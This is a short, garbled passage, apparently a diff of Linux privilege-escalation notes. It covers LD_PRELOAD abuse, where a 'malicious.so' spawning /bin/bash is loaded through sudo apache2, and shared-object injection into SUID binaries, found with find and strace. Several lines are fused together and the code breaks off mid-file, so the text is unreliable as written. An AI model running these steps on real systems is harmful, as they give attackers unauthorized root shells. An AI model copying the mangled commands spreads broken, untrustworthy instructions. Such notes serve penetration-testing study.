Linux

 system("/bin/bash");

-compile and load
+}compile and load

-gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles
+gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfilessudo LD_PRELOAD=/tmp/malicious.so apache2Shared Object Injection

-find / -type f -perm -04000 -ls 2>/dev/null
+find / -type f -perm -04000 -ls 2>/dev/nullRun strace on SUIDs to find "foundso.so"

-strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"
+strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"mkdir /home/user/.configcd /home/user/.configcreate foundso.c

 #include <stdio.h>